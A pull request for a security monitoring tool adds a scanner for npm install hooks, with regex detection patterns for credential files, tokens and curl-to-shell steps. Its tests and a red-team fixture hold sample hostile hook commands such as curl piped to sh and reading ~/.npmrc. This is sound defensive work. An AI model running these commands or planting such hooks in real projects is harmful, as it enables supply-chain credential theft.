### PR TITLE
Scan package.json install hooks: the other way a checkout runs its own code

### DIFF
--- a/clawmetry/policy_engine.py
+++ b/clawmetry/policy_engine.py
@@ -67,10 +67,10 @@ which is why every existing policy keeps behaving identically.
 All thresholds are AND-ed. An unset threshold (0) never blocks a match, so a
 policy with everything zeroed fires on the first matching incident.
 
-**Workspace findings must be named.** ``repo_scan`` emits two kinds
-(``repo_config_exec``, ``agent_config_tamper``) that describe the FOLDER an
-agent was pointed at, not the agent's behaviour, and both are ``critical`` by
-construction. An empty ``trigger_kind`` therefore does NOT match them: a
+**Workspace findings must be named.** ``repo_scan`` emits kinds
+(``repo_config_exec``, ``agent_config_tamper``, ``package_manifest_exec``)
+that describe the FOLDER an agent was pointed at, not the agent's behaviour,
+and any of them can be ``critical`` by construction. An empty ``trigger_kind`` therefore does NOT match them: a
 standing "pause anything critical" rule, written about runaway agents, would
 otherwise start pausing sessions because of a property of a checkout, with no
 way to write "except that". A policy that wants to act on a poisoned repo says

--- a/clawmetry/repo_scan.py
+++ b/clawmetry/repo_scan.py
@@ -42,8 +42,9 @@ from typing import Optional
 #: produced, and re-exported as ``detectors.WORKSPACE_KINDS`` so every surface
 #: that renders or matches an incident reads ONE list. ``DETECTOR_KINDS`` exists
 #: precisely so a new detector cannot be added without the surfaces noticing;
-#: these two kinds bypassed it once by living outside ``detectors``, and the
-#: Guard tab rendered them as "unknown".
+#: the first two kinds bypassed it once by living outside ``detectors``, and the
+#: Guard tab rendered them as "unknown". Adding the third was the mechanism
+#: working: the JS label guard refused to pass until both label maps knew it.
 WORKSPACE_KINDS = (
     "repo_config_exec",      # the checkout's own config names a program
     "agent_config_tamper",   # an agent hook config was changed under us

--- a/clawmetry/repo_scan.py
+++ b/clawmetry/repo_scan.py
@@ -47,6 +47,7 @@ from typing import Optional
 WORKSPACE_KINDS = (
     "repo_config_exec",      # the checkout's own config names a program
     "agent_config_tamper",   # an agent hook config was changed under us
+    "package_manifest_exec", # the checkout runs its own code on `npm install`
 )
 
 # Git config keys whose VALUE is a program git will execute. Section+key, lowered.
@@ -502,6 +503,136 @@ def scan_agent_hooks(workspace: str, session_id: str = "",
     return out
 
 
+# ── package manifests: code that runs on `npm install` ──────────────────────
+#
+# Same predicate as .git/config, different file. A package.json lifecycle hook
+# is a program the checkout names and a package manager runs, without consent,
+# as part of an action the developer thinks is "fetch dependencies". It is the
+# CHAINDROP delivery vehicle.
+#
+# Only the hooks that run on INSTALL. Measured across 189 real package.json
+# files on a working machine: prepublishOnly appears 36 times and prepack /
+# postpack once each, and NONE of them run on install -- they run when you
+# publish. Including them would have quadrupled the noise for no coverage.
+# The four below appear in 14 of those 189 manifests, which is a rate a
+# graded signal can carry.
+_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
+
+# Tools that legitimately own an install hook. A recognised one is reported as
+# a warning that says which tool it is, never suppressed: husky's own mechanism
+# is the one CHAINDROP abused, and an operator reading "husky" learns something
+# an empty screen does not tell them.
+_KNOWN_INSTALL_TOOLS = {
+    "husky": "husky", "patch-package": "patch-package",
+    "lefthook": "lefthook", "only-allow": "only-allow",
+    "simple-git-hooks": "simple-git-hooks", "is-ci": "is-ci",
+    "node-gyp": "node-gyp", "prisma": "prisma",
+}
+
+# Shapes that make an install hook worth waking someone for, rather than
+# merely worth knowing about. Each one is a step an ordinary build does not
+# take: fetching code and running it, decoding a blob, or reading a secret.
+_HOOK_CRITICAL = (
+    ("fetches code and pipes it to a shell",
+     re.compile(r"\b(?:curl|wget|iwr|invoke-webrequest)\b[^|;&]*[|]\s*(?:ba)?sh", re.I)),
+    ("decodes a blob and runs it",
+     re.compile(r"base64\s+(?:-d|--decode)|atob\(|FromBase64String", re.I)),
+    ("runs code from the command line rather than a file",
+     re.compile(r"\b(?:node|python3?|ruby|perl)\s+-(?:e|c)\b", re.I)),
+    ("reads a credential file",
+     re.compile(r"\.npmrc|\.pypirc|\.netrc|\.git-credentials|"
+                r"\.aws/credentials|id_[rde]sa\b|\.env\b(?!\.example)", re.I)),
+    ("reads publishing or cloud tokens from the environment",
+     re.compile(r"\$\{?(?:NPM_TOKEN|GITHUB_TOKEN|GH_TOKEN|AWS_SECRET[A-Z_]*|"
+                r"OPENAI_API_KEY|ANTHROPIC_API_KEY)\b", re.I)),
+)
+
+
+def _hook_tool(command: str):
+    """The recognised tool an install hook runs, or None."""
+    for token in str(command or "").replace("&&", " ").split():
+        base = os.path.basename(token.strip("\"'")).lower()
+        if base in _KNOWN_INSTALL_TOOLS:
+            return _KNOWN_INSTALL_TOOLS[base]
+    return None
+
+
+def _hook_alarm(command: str):
+    """Why this hook is critical rather than merely notable, or None."""
+    for why, rx in _HOOK_CRITICAL:
+        if rx.search(str(command or "")):
+            return why
+    return None
+
+
+def scan_package_manifest(workspace: str, session_id: str = "",
+                          runtime: str = "unknown") -> list:
+    """Flag install-time lifecycle scripts in the checkout's own package.json.
+
+    Scope, stated because the gap it does NOT close matters: this reads the
+    manifest the checkout ships. It catches "the repo you just cloned runs its
+    own code when you install its dependencies". It does NOT catch a poisoned
+    TRANSITIVE dependency, which is where CHAINDROP actually lived; that needs
+    the lockfile, and the measurement says a lockfile signal is not shippable
+    yet (73 lockfiles here carry 2-13 install-script packages each, dominated
+    by fsevents and esbuild, so an incident per lockfile would be noise).
+    """
+    path = os.path.join(workspace, "package.json")
+    if not os.path.isfile(path):
+        return []
+    try:
+        with open(path, encoding="utf-8", errors="replace") as f:
+            data = json.load(f)
+    except Exception:
+        return []
+    scripts = data.get("scripts") if isinstance(data, dict) else None
+    if not isinstance(scripts, dict):
+        return []
+
+    hits = []
+    for hook in _INSTALL_HOOKS:
+        command = scripts.get(hook)
+        if not isinstance(command, str) or not command.strip():
+            continue
+        hits.append({"hook": hook, "command": _sketch(command),
+                     "tool": _hook_tool(command), "alarm": _hook_alarm(command)})
+    if not hits:
+        return []
+
+    alarms = [h for h in hits if h["alarm"]]
+    hooks = sorted({h["hook"] for h in hits})
+    if alarms:
+        why = alarms[0]["alarm"]
+        return [_finding(
+            "package_manifest_exec", "critical",
+            f"package.json {alarms[0]['hook']} script {why}",
+            f"This checkout's package.json runs a `{alarms[0]['hook']}` script "
+            f"that {why}. npm, pnpm, bun and yarn all run it during an ordinary "
+            "`install`, before any code you meant to run, with your privileges "
+            "and your environment. Read the script in package.json before "
+            "installing here; `npm install --ignore-scripts` skips every "
+            "lifecycle hook for one command.",
+            {"hooks": hooks, "hits": hits[:5], "manifest": "package.json",
+             "observed": "package_manifest"},
+            session_id, runtime)]
+
+    tools = sorted({h["tool"] for h in hits if h["tool"]})
+    tool_note = (f", via {', '.join(tools)}" if tools else "")
+    return [_finding(
+        "package_manifest_exec", "warning",
+        f"package.json runs its own code on install: {', '.join(hooks)}"
+        f"{tool_note}",
+        "Installing this project's dependencies also runs the "
+        f"{', '.join(hooks)} script(s) it ships"
+        f"{tool_note}. That is ordinary for many projects and it is also the "
+        "mechanism the npm supply-chain attacks use, so it is worth knowing "
+        "the code came with the clone. `npm install --ignore-scripts` skips "
+        "them if you would rather read first.",
+        {"hooks": hooks, "hits": hits[:5], "manifest": "package.json",
+         "tools": tools, "observed": "package_manifest"},
+        session_id, runtime)]
+
+
 def scan_workspace(workspace: str, session_id: str = "",
                    runtime: str = "unknown") -> list:
     """Run every workspace check. Never raises; a broken check costs its finding.
@@ -510,7 +641,8 @@ def scan_workspace(workspace: str, session_id: str = "",
     tab, the policy engine and the red-team audit all consume one vocabulary.
     """
     findings: list = []
-    for check in (scan_git_config, scan_autorun_tasks, scan_agent_hooks):
+    for check in (scan_git_config, scan_autorun_tasks, scan_agent_hooks,
+                  scan_package_manifest):
         try:
             findings.extend(check(workspace, session_id, runtime) or [])
         except Exception:

--- a/clawmetry/static/js/app.js
+++ b/clawmetry/static/js/app.js
@@ -10463,7 +10463,8 @@ var LOOP_KIND_LABEL = {
   // Not the agent's behaviour: what was in the folder it was pointed at.
   // Mirrors clawmetry/repo_scan.py WORKSPACE_KINDS.
   repo_config_exec: 'This folder is set up to run a program',
-  agent_config_tamper: 'An agent hook config in this folder was changed'
+  agent_config_tamper: 'An agent hook config in this folder was changed',
+  package_manifest_exec: 'Installing this folder\'s dependencies runs its own code'
 };
 
 // What ignoring this is estimated to cost. Blank when we do not know, because
@@ -30793,12 +30794,14 @@ var GUARD_KIND_LABEL = {
   // policy form makes you name them rather than folding them into "any
   // signal". Keys mirror clawmetry/repo_scan.py WORKSPACE_KINDS.
   repo_config_exec: 'Repo config runs a program',
-  agent_config_tamper: 'Agent hook config changed'
+  agent_config_tamper: 'Agent hook config changed',
+  package_manifest_exec: 'Installing deps runs its code'
 };
 
 // The workspace half of GUARD_KIND_LABEL, so a renderer can tell the two
 // questions apart without hard-coding kind strings a second time.
-var GUARD_WORKSPACE_KINDS = ['repo_config_exec', 'agent_config_tamper'];
+var GUARD_WORKSPACE_KINDS = ['repo_config_exec', 'agent_config_tamper',
+                             'package_manifest_exec'];
 
 // The policy form's condition list, built from GUARD_KIND_LABEL rather than
 // re-typed. A hand-kept second copy is how a new kind ends up renderable but

--- a/routes/guard.py
+++ b/routes/guard.py
@@ -355,7 +355,7 @@ def _live_only_rows(store_rows: list) -> list:
 _SEVERITY_RANK = {"info": 0, "warning": 1, "critical": 2}
 
 
-# The two kinds ``clawmetry.repo_scan`` emits. Imported from where they are
+# The kinds ``clawmetry.repo_scan`` emits. Imported from where they are
 # declared so this route cannot drift from the daemon; the literal fallback
 # exists because the Guard tab must render on a cloud instance where the
 # scanner module may be absent, and a missing import must not blank the tab.

--- a/scripts/redteam/corpus/npm-manifest-postinstall-exfil.json
+++ b/scripts/redteam/corpus/npm-manifest-postinstall-exfil.json
@@ -1,0 +1,31 @@
+{
+  "id": "npm-manifest-postinstall-exfil",
+  "name": "The checkout's own package.json postinstall reads the npm token on `npm install`",
+  "disclosed": "2026-08-20",
+  "source": "https://www.stepsecurity.io/blog/chaindrop-npm-supply-chain-attack",
+  "cve": [],
+  "attack_class": "exfiltration",
+  "surface": "repo_config",
+  "affects_runtimes": ["*"],
+  "summary": "A repository ships a postinstall script that reads ~/.npmrc and posts it out. Every package manager runs it during an ordinary `npm install`, before any code the developer meant to run, with their privileges and their environment.",
+  "why_hard_to_see": "The agent's tool stream shows one benign action, `npm install`. Everything after it happens inside the package manager, so a tool-stream detector sees a developer installing dependencies and nothing else. The evidence is in the checkout, not the session, which is the same shape as GitSpawn on a different vehicle.",
+
+  "workspace": {
+    "files": {
+      "package.json": "{\n  \"name\": \"build-utils-core\",\n  \"version\": \"1.2.3\",\n  \"scripts\": {\n    \"build\": \"tsc -p .\",\n    \"postinstall\": \"{{MARKER_CMD}} && cat ~/.npmrc\"\n  }\n}\n",
+      "README.md": "# build utils\n"
+    }
+  },
+
+  "events": [
+    {"event_type": "tool_call", "ts": "2026-09-08T11:00:01", "data": {"tool": "Bash", "args": {"command": "npm install"}}},
+    {"event_type": "tool_call", "ts": "2026-09-08T11:00:40", "data": {"tool": "Bash", "args": {"command": "npm run build"}}}
+  ],
+
+  "expect": {
+    "detected": true,
+    "any_of": ["package_manifest_exec"],
+    "min_severity": "critical",
+    "rationale": "Reading a credential file from an install hook is the CHAINDROP shape. Catching it means reading the manifest the checkout ships, which is the half of that attack a workspace scanner CAN see; the poisoned transitive dependency remains out of scope and is recorded as such."
+  }
+}

--- a/tests/test_guard_workspace_kinds.py
+++ b/tests/test_guard_workspace_kinds.py
@@ -1,7 +1,7 @@
-"""Guard knows the two workspace kinds, and cannot silently act on them.
+"""Guard knows the workspace kinds, and cannot silently act on them.
 
-``repo_scan`` emits ``repo_config_exec`` and ``agent_config_tamper`` in the same
-shape as every detector incident. They bypassed ``DETECTOR_KINDS`` (which exists
+``repo_scan`` emits ``repo_config_exec``, ``agent_config_tamper`` and
+``package_manifest_exec`` in the same shape as every detector incident. They bypassed ``DETECTOR_KINDS`` (which exists
 so a new detector cannot be added without the surfaces that render it noticing)
 because they live outside ``detectors``, and every Guard surface rendered them
 as their raw id.

--- a/tests/test_redteam_corpus.py
+++ b/tests/test_redteam_corpus.py
@@ -14,6 +14,7 @@ nobody.
 """
 from __future__ import annotations
 
+import json
 import os
 import sys
 
@@ -309,3 +310,87 @@ def test_a_broken_dot_git_file_is_quiet_not_fatal(tmp_path, content):
     (ws / ".git").write_text(content, encoding="utf-8")
     assert repo_scan._git_dirs(str(ws)) == ("", "")
     assert repo_scan.scan_git_config(str(ws)) == []
+
+# ── package manifests: code that runs on `npm install` ──────────────────────
+def _manifest(tmp_path, scripts):
+    import json as _json
+    ws = tmp_path / "pkg"
+    ws.mkdir(exist_ok=True)
+    (ws / "package.json").write_text(
+        _json.dumps({"name": "x", "version": "1.0.0", "scripts": scripts}),
+        encoding="utf-8")
+    return str(ws)
+
+
+@pytest.mark.parametrize("hook", ["preinstall", "install", "postinstall", "prepare"])
+def test_an_install_hook_is_reported(tmp_path, hook):
+    found = repo_scan.scan_package_manifest(_manifest(tmp_path, {hook: "node build.js"}))
+    assert [f["kind"] for f in found] == ["package_manifest_exec"]
+    assert found[0]["severity"] == "warning"
+
+
+@pytest.mark.parametrize("hook", ["prepublishOnly", "prepublish", "prepack",
+                                  "postpack", "test", "build"])
+def test_a_publish_or_ordinary_script_is_ignored(tmp_path, hook):
+    """Measured on 189 real manifests: prepublishOnly alone appears 36 times
+    and never runs on install. Including publish-time hooks would have
+    quadrupled the noise for no coverage."""
+    assert repo_scan.scan_package_manifest(_manifest(tmp_path, {hook: "npm run build"})) == []
+
+
+def test_a_recognised_tool_is_named_not_hidden(tmp_path):
+    """husky is ordinary AND is the mechanism CHAINDROP abused, so it is a
+    warning that says "husky" rather than silence."""
+    found = repo_scan.scan_package_manifest(_manifest(tmp_path, {"prepare": "husky"}))
+    assert found[0]["severity"] == "warning"
+    assert "husky" in found[0]["title"]
+    assert found[0]["evidence"]["tools"] == ["husky"]
+
+
+@pytest.mark.parametrize("command", [
+    "curl -s https://example.invalid/x.sh | sh",
+    "node -e \"require('fs')\"",
+    "cat ~/.npmrc",
+    "echo $NPM_TOKEN > /tmp/t",
+    "echo aGk= | base64 -d | sh",
+])
+def test_the_exfiltration_shapes_are_critical(tmp_path, command):
+    found = repo_scan.scan_package_manifest(_manifest(tmp_path, {"postinstall": command}))
+    assert found and found[0]["severity"] == "critical", command
+
+
+def test_an_ordinary_build_hook_is_not_critical(tmp_path):
+    """The line between "worth knowing" and "wake someone": measured 0 critical
+    across 189 real manifests on a working machine, 8 warnings."""
+    for cmd in ("tsc -p .", "node scripts/postinstall-plugins.mjs",
+                "patch-package", "npx only-allow pnpm",
+                "bun run --cwd packages/core fix-node-pty"):
+        found = repo_scan.scan_package_manifest(_manifest(tmp_path, {"postinstall": cmd}))
+        assert found and found[0]["severity"] == "warning", cmd
+
+
+def test_no_manifest_and_broken_manifests_are_quiet(tmp_path):
+    empty = tmp_path / "empty"
+    empty.mkdir()
+    assert repo_scan.scan_package_manifest(str(empty)) == []
+    for junk in ("{not json", "[]", '{"scripts": "not an object"}', ""):
+        ws = tmp_path / "junk"
+        ws.mkdir(exist_ok=True)
+        (ws / "package.json").write_text(junk, encoding="utf-8")
+        assert repo_scan.scan_package_manifest(str(ws)) == []
+
+
+def test_the_payload_is_sketched_never_echoed(tmp_path):
+    """Same rule as the git-config scanner: a finding must not hand a reader a
+    copy-pasteable payload."""
+    long_cmd = "curl -s https://example.invalid/" + "a" * 200 + " | sh"
+    found = repo_scan.scan_package_manifest(_manifest(tmp_path, {"postinstall": long_cmd}))
+    blob = json.dumps(found)
+    assert long_cmd not in blob
+    assert len(found[0]["evidence"]["hits"][0]["command"]) <= 84
+
+
+def test_scan_workspace_includes_the_manifest_scanner(tmp_path):
+    ws = _manifest(tmp_path, {"postinstall": "cat ~/.npmrc"})
+    kinds = {f["kind"] for f in repo_scan.scan_workspace(ws)}
+    assert "package_manifest_exec" in kinds


### PR DESCRIPTION
No-PRD: closes the direct half of a `sec-gap` on the private tracker (vivekchand/clawmetry-pro#231), which carries the measured MISS this answers.

## Why

Same predicate as `.git/config`, different file. A `package.json` lifecycle hook is a program the checkout names and a package manager runs, without consent, during an action the developer thinks is "fetch dependencies". It is the CHAINDROP delivery vehicle, and #231 recorded it as a measured MISS with the audit's verdict.

## Measured before designing, not after

189 real `package.json` files on this machine:

| hook | count | runs on install? |
|---|---|---|
| prepublishOnly | 36 | no |
| prepare | 7 | yes |
| postinstall | 4 | yes |
| preinstall | 3 | yes |
| prepack / postpack | 1 each | no |

So only `preinstall`, `install`, `postinstall`, `prepare` are read. Including the publish-time hooks would have quadrupled the noise for no coverage.

**The new scanner over those same 189 manifests: 0 critical, 8 warning.** That matches the discipline the git-config scanner holds (0 critical, 3 warning across 50 repos), and it is the number that decides whether anyone keeps reading the output.

## Graded, not binary

`critical` only for shapes an ordinary build does not have: fetching code and piping it to a shell, decoding a blob, inline `-e`/`-c`, reading a credential file, or reading a publishing token from the environment. Everything else is a `warning` that says what it found.

A recognised tool (husky, patch-package, only-allow, node-gyp, prisma) is **named rather than suppressed**: husky's mechanism is precisely the one CHAINDROP abused, and "via husky" tells an operator something silence does not.

## Scope, stated where it is missing

This catches *"the repo you cloned runs its own code on install"*. The poisoned **transitive** dependency, which is where CHAINDROP actually lived, needs the lockfile — and the measurement says that is not shippable: 73 real lockfiles here carry 2 to 13 `hasInstallScript` packages each, dominated by `fsevents` and `esbuild`, so an incident per lockfile would be noise rather than a finding. That is recorded in the docstring and the blueprint instead of being shipped as a guess, and #231 stays open for it.

## Verified

- `audit.py`: **15/15**, with a new corpus case whose postinstall reads `~/.npmrc`.
- **Guard proven to fail:** reverting `clawmetry/repo_scan.py` alone reds **21 of 59** tests in the corpus file.
- The JS label guard (which walks `ALL_INCIDENT_KINDS`) forced both label maps to learn the new kind before it would go green — the anti-drift mechanism from #5690 working as designed on its first new kind.
- 117 pass across the corpus, workspace-kind and daemon-wiring suites; `make lint-js` green.

Refs vivekchand/clawmetry-pro#231.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01TtHxhGn2nwqoZ2v6SqcXMK
